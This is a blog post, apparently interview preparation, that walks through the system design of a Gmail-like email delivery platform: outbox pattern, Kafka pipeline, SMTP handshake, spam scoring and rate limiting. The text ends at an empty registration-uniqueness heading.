DEV Community: Arghya Majumder

Email Delivery System — Gmail / Outlook

Arghya Majumder — Fri, 10 Apr 2026 10:43:50 +0000

Backend / Frontend Split: 90% Backend · 10% Frontend
The interesting engineering is entirely on the backend: transactional outbox pattern for zero email loss, SMTP protocol handshake for cross-domain delivery, async parallel validation pipeline, consistent hashing for sharding 1.5B user records, and routing logic to split internal vs external delivery. Frontend is a standard SPA — worth mentioning but not a deep focus.

1. Problem + Scope

Design an email delivery platform like Gmail. Users register with a unique email address, compose and send emails to one or multiple recipients (with CC/BCC and attachments), receive emails from other users across different domains, and search their mailbox by keyword.

In scope: User registration (unique email ID guarantee), compose + draft, send email (internal Gmail-to-Gmail + external cross-domain via SMTP), receive email from external domains, attachments, email threading, search.

Out of scope: Calendar integration, Google Meet, spam ML model training, email marketing bulk send, DKIM/SPF key management internals.

2. Assumptions & Scale

Metric	Value
Daily Active Users	1.5B
Emails sent per day	~300B (200 emails/user/day at peak)
Peak email send rate	~3.5M emails/sec
Avg email size (body + metadata)	75KB
Avg attachment size	2MB
Emails with attachments	~20%
Storage per user/year	~15GB
Total storage	1.5B × 15GB = 22.5 exabytes
Search QPS	~10M/sec
User DB lookup QPS	~50M/sec (autocomplete + auth)

Write path math:

3.5M emails/sec × 75KB body = ~260GB/sec of email body writes. This cannot land on a single DB. We need horizontally sharded storage for the mailbox, separated from metadata (for search optimization).

These numbers drive: sharded user DB (consistent hashing), separate mailbox body vs metadata tables, Elasticsearch with pre-joined aggregator, S3 for attachments (not DB), Kafka decoupled delivery pipeline.
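The figures in the table can be re-derived in a few lines. This is only a sketch of the arithmetic; the variable names are illustrative and every input comes from the table above. Note that 300B emails/day averages out to roughly 3.5M/sec, so the table's send rate is what that daily volume implies.

```python
# Back-of-envelope check of the scale table (inputs taken from the table above).
SECONDS_PER_DAY = 86_400

daily_active_users = 1_500_000_000
emails_per_user_per_day = 200
avg_email_bytes = 75_000                  # 75KB body + metadata
storage_per_user_bytes = 15_000_000_000   # ~15GB per user per year
send_rate_per_sec = 3_500_000             # rate used throughout the article

emails_per_day = daily_active_users * emails_per_user_per_day
emails_per_sec = emails_per_day / SECONDS_PER_DAY
body_write_bytes_per_sec = send_rate_per_sec * avg_email_bytes
total_storage_bytes = daily_active_users * storage_per_user_bytes

print(f"emails/day:        {emails_per_day:,}")
print(f"emails/sec:        {emails_per_sec:,.0f}")
print(f"body writes/sec:   {body_write_bytes_per_sec / 1e9:.1f} GB")
print(f"total storage:     {total_storage_bytes / 1e18:.1f} EB")
```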

3. Functional Requirements

User registration with globally unique email ID
Compose and auto-save email as draft (body + attachments)
Send email to one or multiple recipients (To, CC, BCC)
Receive email — both from Gmail users (internal) and other domains (Outlook, Yahoo) via SMTP
View inbox, drafts, sent items folder structure
Reply to email maintaining conversation thread
Attach files (PDF, images, documents) — up to 25MB
Search email by keyword (subject, body, sender)

4. Non-Functional Requirements

Requirement	Target
Email send latency	< 2 seconds for internal delivery
Cross-domain delivery	< 30 seconds (SMTP handshake + DNS lookup)
Availability	99.99% (email is business-critical)
Durability	Zero email loss — at-least-once delivery guaranteed
Search latency	< 500ms
Attachment upload	Non-blocking (async, pre-scanned before send)

Consistency Model — CAP Theorem applied per domain:

Domain	Model	Justification
User registration	Strong (CP)	No two users can share an email ID — uniqueness must be enforced globally
Email send/receive	Eventual (AP)	1–2 second delay reaching recipient's inbox is acceptable
Draft autosave	Eventual	Losing a draft keystroke is acceptable; losing a sent email is not
Validation pipeline	Eventual	Async parallel validation — email queued until all pass

[!IMPORTANT]
The consistency split is an interview favourite. Registration must be strongly consistent (unique email = primary key, DB constraint). Everything after that — send, receive, search — can be eventually consistent. This is why the write path goes through a queue, not a direct DB insert.

🧠 Mental Model

Email delivery has four distinct flows worth knowing cold:

Registration flow — User picks an email ID → system must guarantee no duplicate globally → consistent DB write with email as primary key
Compose + Send flow — User drafts email → attachments pre-uploaded to S3 → on Send: email saved to outbox table → Kafka consumer picks it up → validation pipeline (spam, malware, policy) → route to internal delivery or SMTP relay
Internal delivery flow — Recipient is a Gmail user → delivery consumer moves email from outbox table into recipient's mailbox items table → push notification
External delivery flow — Recipient is Outlook/Yahoo → SMTP relay worker does DNS/MX lookup → opens TCP connection to recipient's SMTP server → 15-step SMTP handshake → email delivered cross-domain

 User Composes Email
        │
        ▼
  Draft DB + S3 (attachments)
        │
   User clicks Send
        │
        ▼
  Mail Send Service
  (fetch from draft DB)
        │
        ▼
  Outbox Table (persisted first — never lose)
        │
  CDC / Outbox Consumer
        │
        ▼
     Kafka Broker
        │
  Delivery Orchestrator
  (spam + malware + policy — async parallel)
        │
   ┌────┴────────────┐
   ▼                 ▼
Inbound Topic    Outbound Topic
(Gmail→Gmail)    (Gmail→Outlook/Yahoo)
   │                 │
   ▼                 ▼
Delivery         SMTP Relay Worker
Consumer         (DNS/MX → TCP → handshake)
   │                 │
   ▼                 ▼
Mailbox DB      Recipient SMTP Server

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path	Perceived send latency	Optimistic: email saved to outbox immediately, UI shows "Sent" — delivery happens async
Reliable Path	Zero email loss	Transactional outbox pattern: email persisted before Kafka publish — survives any service crash

5. API Design

Method	Path	Description
POST	`/api/v1/accounts`	Register new user. Email ID in body. DB enforces uniqueness via primary key constraint.
POST	`/api/v1/emails/draft`	Autosave draft. Called as the user types, debounced so that a burst of keystrokes produces one request. Returns `draftId`.
POST	`/api/v1/emails/send`	Send email. Body contains only `draftId` + recipients (To/CC/BCC) — NOT the content. Mail Send Service fetches content from Draft DB using `draftId`.
GET	`/api/v1/emails/:emailId`	Fetch full email (body + attachment URLs). Attachment URLs are pre-signed S3 URLs, not raw bytes.
GET	`/api/v1/emails?folder=inbox&page=`	Paginated mailbox listing. Returns metadata only (subject, sender, preview snippet).
POST	`/api/v1/attachments`	Upload attachment. Returns `attachmentId`. Client passes this ID in the draft — not the file bytes. Two-step upload: client → S3 signed URL (direct), then registers `attachmentId` here.
GET	`/api/v1/search?q=&page=`	Full-text search across subject + body. Hits Elasticsearch.

[!TIP]
Interview tip on send API design: The POST /emails/send body should contain draftId, not the full email payload. Say: "If we pass the entire email content + 25MB attachment in the send request, we get timeouts and heavy payload. We decouple: attachments are pre-uploaded to S3, body is pre-saved as draft. The send request is lightweight — just 'send draft X to these recipients.'"

6. End-to-End Flow

[!IMPORTANT]
Email is a queue-first system. Every send operation is asynchronous. The client never waits for delivery — it waits only for acknowledgement that the email has been durably queued. Delivery, validation, and routing happen independently in the background. This is not a performance choice — it is a correctness choice. Without a queue, any crash between "send clicked" and "email delivered" loses the email permanently.

⚡ Async Architecture Principles (say these out loud):

All email sending goes through Kafka — never direct DB or direct SMTP call
At-least-once delivery via Kafka offset commit — consumers can crash and replay
Idempotency via message_id — consumers deduplicate on re-processing
Retry with exponential backoff — SMTP failures retry for up to 4 days before bouncing
Dead Letter Queue — emails that exhaust retries are archived, never silently dropped
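At-least-once delivery only works if consumers tolerate replays. A minimal sketch of deduplication on `message_id` follows; the class name and the in-memory set are assumptions for illustration, and a real consumer would keep processed IDs in a durable store.

```python
from dataclasses import dataclass, field


@dataclass
class IdempotentConsumer:
    """Applies each message_id once, even if the broker redelivers it."""

    processed_ids: set = field(default_factory=set)  # stand-in for a durable dedupe store
    delivered: list = field(default_factory=list)    # stand-in for the mailbox write

    def handle(self, message: dict) -> bool:
        message_id = message["message_id"]
        if message_id in self.processed_ids:
            return False  # replayed after a crash or rebalance: skip side effects
        self.delivered.append(message)
        self.processed_ids.add(message_id)
        return True
```

Calling `handle` twice with the same message delivers it once; the second call returns `False`.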

6.1 Send Email — Quick Reference (speak this out loud in the interview)

Internal flow (Gmail → Gmail):

1. Client clicks Send
   → POST /emails/send {draftId, recipients}
   → API Gateway authenticates + routes

2. Mail Send Service fetches draft content from Draft DB
   → validates recipients exist (User DB lookup)
   → I chose to separate draft storage from send to keep the send request lightweight

3. Email written to Outbox Table (PENDING)
   → This is the durability guarantee — crash after this = email survives
   → I chose the Transactional Outbox Pattern because DB write + Kafka publish
     cannot be made atomic any other way

4. Outbox Consumer (CDC) detects new row → publishes to Kafka
   → The queue absorbs burst — 3.5M emails/sec cannot hit storage directly

5. Delivery Orchestrator consumes from Kafka
   → Fires spam check + policy check + attachment check IN PARALLEL
   → Each validation service writes result to Validation DB independently
   → I run these in parallel because sequential = 3 × 200ms = 600ms per email

6. All checks pass → Orchestrator routes by recipient domain
   → @gmail.com → inbound-send-request topic
   → @outlook.com → outbound-send-request topic

7. Delivery Consumer picks up inbound event
   → Copies email to recipient's Mailbox Items table (Cassandra, partitioned by user_id)
   → Updates Outbox row status = DELIVERED
   → Triggers push notification

On failure at any step → Kafka consumer retries from last offset
On SMTP failure (external) → exponential backoff, try next MX record
After 4 days of failure → Dead Letter Queue → bounce email to sender

Receive flow (Outlook → Gmail):

1. Outlook SMTP server opens TCP connection to Gmail Inbound SMTP Service (port 25)
   → Gmail's MX record points here

2. SMTP handshake
   → Gmail validates: SPF (is this IP authorised to send for outlook.com?)
   → Gmail validates: DKIM (is the cryptographic signature valid?)
   → Gmail checks: does the recipient exist in User DB?
   → If recipient not found → 550 No such user → Outlook notifies its sender

3. Gmail accepts message off the wire → sends 250 Message accepted
   → This commits Gmail's responsibility — email is now durably ours
   → Outlook's responsibility ends here

4. Email published to Kafka inbound-receive topic
   → Spam Filter Service scores the email (layered: IP reputation → SPF/DKIM → ML model)
   → Score < 0.3 → folder = INBOX, score ≥ 0.3 → folder = SPAM (section 9.4 adds a reject threshold at 0.7)

5. Inbound Consumer writes to Cassandra mailbox_items
   → Partition key = recipient user_id → all inbox writes for one user go to one node
   → Aggregator Service indexes email body + metadata in Elasticsearch for search

6. Notification Service pushes to recipient's WebSocket connection
   → "New email from alice@outlook.com"
   → If no active WebSocket → mobile push notification (FCM/APNs)

6.2 Send Email (Internal — Gmail to Gmail, Sequence Diagram)

1. User clicks Send. Client calls POST /emails/send with { draftId, to: ["bob@gmail.com"], cc: [], bcc: [] }.
2. Mail Send Service fetches full email content from Draft DB using draftId (body + S3 attachment references).
3. Mail Send Service writes the email to the Outbox Table in Mailbox DB. Status = PENDING. This write is the durability guarantee: if anything crashes after this, the email is not lost.
4. Outbox Consumer (CDC pipeline watching Outbox Table) detects the new row and publishes the event to Kafka.
5. Delivery Orchestrator consumes from Kafka. Fires async parallel validation:
   - Spam checker (content analysis)
   - Policy checker (enterprise rules)
   - Attachment check (reads pre-computed result from S3 Validation DB; scan already done at upload time)
6. All validations write their result to the Validation DB (one row per email, one column per check).
7. Once all validation columns are green: Orchestrator checks recipient domain. bob@gmail.com = internal → publishes to inbound-send-request Kafka topic.
8. Delivery Consumer picks up the inbound event. Copies email from Outbox Table → Mailbox Items Table for bob@gmail.com. Updates Outbox row status = DELIVERED.
9. Notification Service pushes "New email from alice@gmail.com" to Bob's connected WebSocket / push notification.

6.3 Send Email (External — Gmail to Outlook, Sequence Diagram)

Steps 1–6 same as above. At step 7, recipient domain = outlook.com → Orchestrator publishes to outbound-send-request topic. The remaining steps are:

SMTP Relay Worker consumes from outbound-send-request.
DNS/MX lookup: queries MX resolver for outlook.com → gets list of Outlook SMTP server addresses in priority order. Result cached in MX Cache (TTL = 1 hour), which avoids a DNS round-trip on every email.
SMTP Relay Worker opens TCP connection to Outlook SMTP server on port 25.
SMTP handshake:
- Gmail sends EHLO → Outlook responds 250 + supported extensions
- Gmail sends MAIL FROM:<alice@gmail.com> → Outlook responds 250 OK
- Gmail sends RCPT TO:<bob@outlook.com> → Outlook validates bob exists in its DB → 250 OK (or 550 No such user)
- Gmail sends DATA → streams headers + body → Outlook responds 250 Message accepted
- Gmail sends QUIT
Outlook's own delivery system routes email to Bob's inbox.
SMTP Relay Worker receives 250 success → updates Outbox Table status = DELIVERED_EXTERNAL.

6.4 Receive Email (External — Outlook to Gmail, Sequence Diagram)

This is the reverse of 6.3: Outlook's SMTP server initiates the connection to Gmail's servers.

Key steps:

Outlook's SMTP server opens TCP connection to Gmail's Inbound SMTP Service (port 25 on the host that gmail.com's public MX record points to)
Gmail's Inbound SMTP Service validates: SPF (is this IP authorised to send for outlook.com?), DKIM (is the signature valid?), does the recipient email exist in User DB?
If recipient doesn't exist → 550 No such user here → Outlook notifies its sender
Email passed to Spam Filter Service for scoring (see Deep Dive 9.4)
Based on spam score: published to Kafka inbound-receive with folder = INBOX or folder = SPAM
Inbound Consumer writes to Cassandra mailbox, partitioned by user_id
Notification Service pushes to recipient's connected WebSocket or mobile push

[!NOTE]
Key Insight: Gmail acknowledges 250 Message accepted to Outlook's SMTP server before the email is fully processed and in the inbox. This is intentional. Once we've accepted the message off the wire, it's in our Kafka/DB pipeline and we own the delivery guarantee. The sender's responsibility ends at 250.

7. High-Level Architecture

Simple Design

Evolved Design (Full Pipeline)

8. Data Model

[!IMPORTANT]
Gmail uses three separate storage systems — never one. This is the most important storage design insight and interviewers always probe it:

"I chose three separate stores because each has a fundamentally different access pattern. One store trying to do all three would fail at scale."

What	Where	Why
Email bodies + mailbox	Cassandra (NoSQL)	3.5M writes/sec — multi-master, partitioned by `user_id`. SQL primary would be first bottleneck.
Attachments	S3 / Blob Storage	Binary files (up to 25MB) never go in a DB. S3 = infinite scale, cheap, CDN-compatible. Emails store only the S3 reference URL.
Search index	Elasticsearch	Full-text search with inverted index. Pre-joined at write time by Aggregator Service. Never query Cassandra for search — it has no full-text capability.

Entity	Storage	Key Columns	Why this store
User	PostgreSQL (sharded)	`email_id` (PK), `user_id`, `password_hash`, `status`, `created_at`	ACID — `email_id` as PK enforces uniqueness. Sharded by consistent hashing on `email_id`.
Draft	PostgreSQL	`draft_id`, `user_id`, `to`, `cc`, `bcc`, `subject`, `body`, `attachment_ids[]`, `updated_at`	ACID — drafts are personal, low-write-volume. Simple relational structure.
Outbox Table	PostgreSQL	`message_id`, `sender_id`, `recipient_ids[]`, `draft_id`, `status` (PENDING/DELIVERED), `created_at`	Transactional outbox — must be in same DB as other mail writes for atomicity. CDC triggers Kafka.
Mailbox Items	Cassandra	`user_id` (partition key), `message_id` (clustering key, TIMEUUID), `sender_id`, `subject`, `body_ref`, `folder`, `is_read`	3.5M writes/sec inbox delivery — Cassandra multi-master handles linear scale. Partition by `user_id` for fast inbox queries.
Mailbox Metadata	Cassandra	`message_id`, `sender_id`, `recipient_ids[]`, `subject`, `attachment_type`, `folder`, `timestamp`	Separated from body — search aggregator joins metadata + body ref. Avoids loading full email bodies for search index.
Validation DB	PostgreSQL	`message_id`, `spam_check` (bool), `policy_check` (bool), `attachment_check` (bool), `updated_at`	Small table, low volume — one row per in-flight email. Ephemeral (deleted post-delivery).
S3 Validation	Redis	`attachmentId → {status, scanned_at}`	Pre-computed at upload time. TTL = 7 days. Fast lookup at validation time — O(1).
MX Cache	Redis	`domain → [smtp_server_address, priority]`	DNS is slow (~100ms). MX records change rarely. TTL = 1 hour.
Attachments	S3	Binary blob, referenced by `attachmentId`	Binary files don't belong in DB. Pre-signed URLs for secure client access.
Search Index	Elasticsearch	`message_id`, `sender`, `recipients`, `subject`, `body_snippet`, `timestamp`	Full-text search with inverted index. Pre-joined by Aggregator service — avoids runtime joins.

[!NOTE]
Key Insight: Mailbox body and metadata are stored in separate Cassandra tables. Aggregator pre-joins them into Elasticsearch documents at write time — not at search time. Runtime joins at 10M search QPS = latency disaster.
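The write-time pre-join can be pictured as a single function that folds a metadata row and the body into one search document. This is a sketch under assumptions: the function name and `snippet_len` are hypothetical, and the field names follow the Search Index row in the table above.

```python
def build_search_document(metadata: dict, body: str, snippet_len: int = 200) -> dict:
    """Merge one metadata row and the email body into a denormalised search document."""
    return {
        "message_id": metadata["message_id"],
        "sender": metadata["sender_id"],
        "recipients": list(metadata["recipient_ids"]),
        "subject": metadata["subject"],
        "body_snippet": body[:snippet_len],  # truncated copy kept alongside the metadata
        "timestamp": metadata["timestamp"],
    }
```

Because the document is assembled once when the email is written, a search query reads a single record and never touches the two Cassandra tables.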

9. Deep Dives

9.1 Transactional Outbox Pattern — Zero Email Loss

Here's the problem we're solving: When a user clicks Send, we need to both save the email to DB AND publish to Kafka. If we publish to Kafka first and the service crashes before the DB write, the event is in flight with no durable record behind it: no Sent copy and no status to track or retry from. If we write to the DB first and crash before the Kafka publish, the email is stuck in the DB and never delivered. How do we guarantee at-least-once delivery?

Naive solution: Write to DB and publish to Kafka in sequence. Problem: not atomic — any crash between the two leaves the system in an inconsistent state.

Chosen solution — Transactional Outbox Pattern:

Mail Send Service writes the email to the Outbox Table in the same DB transaction as any other state update. DB write = durability guarantee.
A separate Outbox Consumer (Change Data Capture — watches the Outbox Table for new rows via Postgres logical replication or polling) publishes to Kafka.
The Outbox Consumer runs independently. If it crashes, it resumes from the last committed offset — Kafka publish is retried. Email is never lost.
Once delivered, Outbox Table row is updated to DELIVERED (or archived).

Trade-off accepted: Adds operational complexity (CDC pipeline, extra table). Delivery is at-least-once — if Outbox Consumer crashes mid-publish, the same email may be published twice. Handle with idempotency key (message_id) at the consumer side.
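A minimal sketch of the pattern, using SQLite in place of PostgreSQL and a polling relay in place of CDC. The function names and the intermediate `PUBLISHED` status are assumptions made for the example; `publish` stands in for a Kafka producer call.

```python
import sqlite3
import uuid


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE outbox ("
        " message_id TEXT PRIMARY KEY,"
        " draft_id TEXT NOT NULL,"
        " status TEXT NOT NULL)"
    )
    return conn


def send_email(conn: sqlite3.Connection, draft_id: str) -> str:
    """Persist the email in the outbox. Nothing is published here."""
    message_id = str(uuid.uuid4())
    with conn:  # one transaction: commit on success, roll back on error
        conn.execute(
            "INSERT INTO outbox (message_id, draft_id, status) VALUES (?, ?, 'PENDING')",
            (message_id, draft_id),
        )
    return message_id


def relay_pending(conn: sqlite3.Connection, publish) -> int:
    """Publish every PENDING row, marking each one only after publish returns."""
    rows = conn.execute(
        "SELECT message_id, draft_id FROM outbox WHERE status = 'PENDING'"
    ).fetchall()
    published = 0
    for message_id, draft_id in rows:
        publish({"message_id": message_id, "draft_id": draft_id})  # may raise
        with conn:
            conn.execute(
                "UPDATE outbox SET status = 'PUBLISHED' WHERE message_id = ?",
                (message_id,),
            )
        published += 1
    return published
```

If `publish` raises, the row stays `PENDING` and the next relay pass picks it up again. If the relay crashes after publishing but before the update, the same event is published twice, which is why consumers deduplicate on `message_id`.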

[!NOTE]
Key Insight: The Outbox Table is a correctness requirement, not a performance optimization. It sidesteps the need for an atomic DB write + Kafka publish: the DB row is the source of truth, and the Kafka publish is retried from it until it succeeds.

9.2 Async Parallel Validation Pipeline

Here's the problem we're solving: Before delivering an email, we must run spam check, policy check, and attachment scan. If we run these sequentially: 3 services × 200ms each = 600ms minimum per email. At 3.5M emails/sec, that is 3.5M × 0.6s ≈ 2.1M email-seconds of validation latency accumulating every second. If one validation service goes down for 15 minutes, every in-flight email blocks until it recovers.

Naive solution: Sequential synchronous calls from Orchestrator to each validation service. Service downtime = full pipeline stall.

Chosen solution — Async parallel with Validation DB:

Orchestrator consumes email from Kafka. Creates a row in Validation DB with all check columns set to NULL (not-yet-checked).
Orchestrator fires all validation services simultaneously (async, non-blocking).
Each service independently reads the email, runs its check, and updates its column in Validation DB (e.g., spam_check = true).
Attachment check is special — it reads from the pre-computed S3 Validation DB (scan was done at upload time, not send time). Scanning a 25MB PDF at send time = too slow.
Orchestrator polls Validation DB (or uses a trigger) until all columns are non-NULL. If all green → route to delivery topic. If any red → reject + notify sender.
If a validation service is down: that column stays NULL. After a timeout, email moves to Delay Queue and is retried later — pipeline never blocks permanently.

Trade-off accepted: Eventual consistency in validation — a service returning after a delay means email delivery is delayed, not blocked. This is acceptable; blocking is not.
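The fan-out and the "NULL column means delay, not block" rule can be sketched with `asyncio`. The function names, the timeout value, and the three sample checks are hypothetical; the returned strings stand in for routing to the delivery topic, rejecting, or moving to the Delay Queue.

```python
import asyncio


async def run_validations(email: dict, checks: dict, timeout_s: float = 1.0) -> str:
    """Run all checks concurrently and return 'DELIVER', 'REJECT', or 'DELAY'."""

    async def guarded(check):
        try:
            return await asyncio.wait_for(check(email), timeout_s)
        except asyncio.TimeoutError:
            return None  # column stays NULL: the service did not answer in time

    names = list(checks)
    results = await asyncio.gather(*(guarded(checks[name]) for name in names))
    row = dict(zip(names, results))  # mirrors one Validation DB row
    if any(value is False for value in row.values()):
        return "REJECT"
    if any(value is None for value in row.values()):
        return "DELAY"
    return "DELIVER"


# Hypothetical checks used only to exercise the orchestration logic.
async def spam_check(email: dict) -> bool:
    await asyncio.sleep(0.01)
    return "free money" not in email["body"]


async def policy_check(email: dict) -> bool:
    await asyncio.sleep(0.01)
    return True


async def unresponsive_check(email: dict) -> bool:
    await asyncio.sleep(10)  # simulates a validation service that is down
    return True
```

Total wall-clock time is bounded by the slowest check or the timeout, whichever is smaller, rather than by the sum of all checks.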

[!NOTE]
Key Insight: Attachment scanning is pre-computed at upload time, not at send time. By send time, the result is already in S3 Validation DB, so the check is an O(1) Redis lookup. This is the only way to keep the validation pipeline fast.

9.3 SMTP Cross-Domain Delivery — 15-Step Handshake

Here's the problem we're solving: Gmail doesn't know how to deliver to Outlook. They're separate networks. How do two mail servers that have never met communicate?

The answer is SMTP (Simple Mail Transfer Protocol) — a standardized set of rules all mail servers follow. SMTP is not a service or a server; it is a protocol.

SMTP Relay Worker flow:

Consumes email from outbound-send-request Kafka topic.
MX Lookup: Queries DNS MX resolver for recipient domain (e.g., outlook.com). Gets list of Outlook SMTP server addresses with priority (lower number = higher priority). Caches result in MX Cache (Redis, TTL = 1 hour).
Opens TCP connection to Outlook SMTP server on port 25.
Outlook responds: 220 outlook.com ESMTP ready
Gmail sends: EHLO gmail.com (identify ourselves)
Outlook responds: 250 + list of supported extensions (TLS, size limits, etc.)
Gmail sends: MAIL FROM:<alice@gmail.com> (Outlook logs the sender)
Outlook responds: 250 OK
Gmail sends: RCPT TO:<bob@outlook.com> (critical validation step)
Outlook checks if bob@outlook.com exists in its own user DB. If not: 550 No such user here, so delivery fails and Gmail notifies Alice. If yes: 250 OK
Gmail sends: DATA (signals start of email content)
Outlook responds: 354 Start mail input
Gmail streams: headers + body + attachments (MIME-encoded inline, since Outlook cannot resolve our internal S3 references)
Gmail sends: . (single period = end of message)
Outlook responds: 250 Message accepted for delivery — email is in Outlook's inbox pipeline
Gmail sends: QUIT → TCP connection closed
SMTP Relay Worker receives 250 → updates Outbox Table status = DELIVERED_EXTERNAL

Trade-off accepted: If Outlook's SMTP server is temporarily unreachable, SMTP Relay Worker retries with exponential backoff using the next-priority MX record. Email may be delayed minutes. This is expected behaviour and standard in SMTP.
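The retry behaviour can be sketched as two small pieces: walking MX hosts in priority order within one attempt, and spacing attempts with exponential backoff inside the 4-day budget. The function names, the 60-second base delay, and the doubling factor are assumptions for illustration; `try_host` stands in for the real SMTP conversation.

```python
from typing import Callable, Iterable, List, Optional, Tuple


def order_mx(records: Iterable[Tuple[int, str]]) -> List[str]:
    """Sort (priority, host) pairs so the lowest priority number is tried first."""
    return [host for _, host in sorted(records)]


def attempt_delivery(
    records: Iterable[Tuple[int, str]], try_host: Callable[[str], bool]
) -> Optional[str]:
    """One delivery attempt: return the first host that accepts, else None."""
    for host in order_mx(records):
        if try_host(host):
            return host
    return None  # every MX host failed; the caller schedules the next retry


def backoff_schedule(
    base_s: float = 60.0, factor: float = 2.0, max_total_s: float = 4 * 24 * 3600
) -> List[float]:
    """Delays between attempts, growing by `factor` until the retry budget is spent."""
    delays, total, delay = [], 0.0, base_s
    while total + delay <= max_total_s:
        delays.append(delay)
        total += delay
        delay *= factor
    return delays
```

Production relays usually cap the per-attempt delay as well; this sketch leaves that out to keep the schedule easy to read.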

[!NOTE]
Key Insight: SMTP is the lingua franca of email servers. Every mail server (Gmail, Outlook, Yahoo) speaks it. The MX cache is critical: a DNS lookup adds ~100ms. If all 3.5M emails/sec were cross-domain, uncached lookups would add 3.5M × 0.1s ≈ 350K seconds of DNS wait per second; the cache removes that cost for every domain already seen.

9.4 Spam Filtering Design

Here's the problem we're solving: Gmail receives ~3.5M emails/sec from external senders. ~45% of global email is spam. Without filtering, user inboxes are unusable. Filtering must be fast enough to not block the inbound pipeline and accurate enough that legitimate emails don't land in spam.

Naive solution — keyword blocklist:

if email.body contains "free money" → mark as spam

Fails: spammers trivially evade keyword lists. Recall is low, false-positive rate is high.

Chosen solution — layered scoring system:

Layer breakdown:

Layer	What it checks	Speed	Impact
Sender Reputation	IP blocklist, domain reputation score, past abuse reports	< 1ms (Redis lookup)	Blocks ~60% of spam before content is read
Authentication	SPF: is sending IP authorised for this domain? DKIM: is cryptographic signature valid?	< 5ms (DNS cached)	Eliminates spoofed sender domains
Content Analysis	ML classifier (trained on billions of labelled emails); features: TF-IDF, URL reputation, attachment type, link density	50–100ms	Catches novel spam patterns
Behavioral Signals	How often do recipients mark similar emails as spam? Do users who receive this sender's mail read it or delete unread?	Async (pre-computed daily)	Adapts to user-specific preferences

Scoring thresholds:

Score < 0.3 → INBOX
Score 0.3–0.7 → SPAM folder (user can recover)
Score > 0.7 → rejected at SMTP layer before 250 is sent (sender gets bounce)
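A compact sketch of the layered idea and the thresholds above. The function names, the email field names, and the fixed scores returned by the cheap layers (1.0 and 0.9) are assumptions for illustration; `ml_score` stands in for the content classifier.

```python
def classify(score: float) -> str:
    """Map a spam score in [0, 1] to the action listed in the thresholds."""
    if score < 0.3:
        return "INBOX"
    if score <= 0.7:
        return "SPAM"
    return "REJECT"


def score_email(email: dict, blocked_ips: set, ml_score) -> float:
    """Run cheap layers first; call the ML model only if they pass."""
    if email["source_ip"] in blocked_ips:  # Layer 1: sender reputation
        return 1.0
    if not (email["spf_pass"] and email["dkim_pass"]):  # Layer 2: authentication
        return 0.9
    return ml_score(email)  # Layer 3: content analysis, the expensive step
```

The early returns are what keep the ML fleet small: a message from a blocklisted IP never reaches `ml_score`.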

Why the layered approach:

Layer 1 (sender reputation) eliminates ~60% of spam in < 1ms, which is cheap. Don't spend ML compute on obvious spam.
Only emails that pass Layers 1 and 2 get the expensive ML content scan.
At 3.5M emails/sec × 100ms per ML scan, scanning everything keeps ~350K inferences in flight at once. With spam at ~45% of traffic, removing 60% of it in Layer 1 drops ~27% of all mail, so ~73% (≈2.6M/sec) still reaches the ML model. That load is handled by horizontally scaling the ML inference fleet.

Trade-off accepted: Probabilistic scoring means some spam reaches inboxes and some legitimate email lands in spam. No spam filter achieves 100% accuracy. The thresholds (0.3/0.7) are tunable; Gmail adjusts them per-user based on their "Mark as not spam" actions.

[!NOTE]
Key Insight: Spam filtering is a cost optimisation problem as much as an accuracy problem. Layer cheap filters first (IP blocklist = 1ms), expensive filters last (ML = 100ms). Under the figures above, reputation filtering cuts ML load from 3.5M to roughly 2.6M inferences/sec before any content is read.

9.5 Rate Limiting and Abuse Protection

Here's the problem we're solving: A compromised Gmail account or a bulk-sender service can send millions of emails in seconds — spamming recipient inboxes and abusing our SMTP relay infrastructure. Without rate limiting, one bad actor can degrade delivery for all other users.

Two surfaces to protect:

Send rate per user — prevent a single account from sending bulk spam
Inbound SMTP rate per source IP — prevent external servers from flooding our inbound pipeline

Send rate limiting (per user):

Redis key: rate:{userId}:{window}
Type: sliding window counter

Limits (configurable by account tier):
  - Free account:    500 emails/day, 25 emails/minute
  - Google Workspace: 2,000 emails/day, 100 emails/minute
  - API (Gmail API): configurable, with abuse monitoring

Implementation:

Mail Send Service checks Redis rate counter before writing to Outbox Table
INCR rate:{userId}:{windowBucket} with EXPIRE = window_duration
If counter > limit → 429 Too Many Requests to client; email not queued
Sliding window: separate counters per minute-bucket; sum the buckets that cover the limit's window (for example, the last 1,440 minute-buckets for the per-day limit)
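The steps above can be sketched with an in-memory dictionary standing in for Redis. The class name is hypothetical, and unlike Redis with `EXPIRE`, this sketch never evicts old buckets.

```python
import time
from collections import defaultdict
from typing import Optional


class SlidingWindowLimiter:
    """Per-user send limiter built from one counter per minute bucket."""

    def __init__(self, limit: int, window_minutes: int):
        self.limit = limit
        self.window_minutes = window_minutes
        # Stand-in for Redis keys of the form rate:{userId}:{windowBucket}.
        self.counters = defaultdict(int)

    def allow(self, user_id: str, now_s: Optional[float] = None) -> bool:
        now_s = time.time() if now_s is None else now_s
        bucket = int(now_s // 60)
        recent = range(bucket - self.window_minutes + 1, bucket + 1)
        used = sum(self.counters.get((user_id, b), 0) for b in recent)
        if used >= self.limit:
            return False  # caller answers 429 Too Many Requests
        self.counters[(user_id, bucket)] += 1  # equivalent of INCR on the current bucket
        return True
```

A free account's per-minute limit would be `SlidingWindowLimiter(limit=25, window_minutes=1)`, and the per-day limit `SlidingWindowLimiter(limit=500, window_minutes=1440)`; a send is allowed only if both agree.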

Inbound SMTP rate limiting (per source IP):

Inbound SMTP Service tracks connection count per source IP in Redis
If source IP opens > 100 connections/sec → temporary 421 Service not available, try again later
If source IP has high spam score (from Sender Reputation layer) → blackhole connections silently
IP reputation updated by Spam Filter Service feedback loop — IPs that consistently send spam get progressively lower connection limits

Abuse signals that trigger automatic throttling:

Signal	Action
> 1% bounce rate on sent emails	Throttle send rate by 50%
> 0.1% spam reports from recipients	Flag account for review
Sudden 10× spike in send volume	Require re-authentication (2FA)
Email content matches known spam pattern	Block send immediately

Dead Letter Queue (DLQ) for undeliverable emails:

Emails that fail all SMTP retry attempts (4 days) → moved to DLQ
DLQ worker sends non-delivery report (NDR) bounce email to original sender
Email is then archived (not deleted) for compliance audit trail

[!NOTE]
Key Insight: Rate limiting is a correctness requirement for email, not just a performance guard. An email platform without rate limits becomes a free spam cannon. The sliding window counter in Redis costs < 1ms per send — there is no reason not to check it on every send request.

9.6 User Registration — Uniqueness at 1.5B Scale

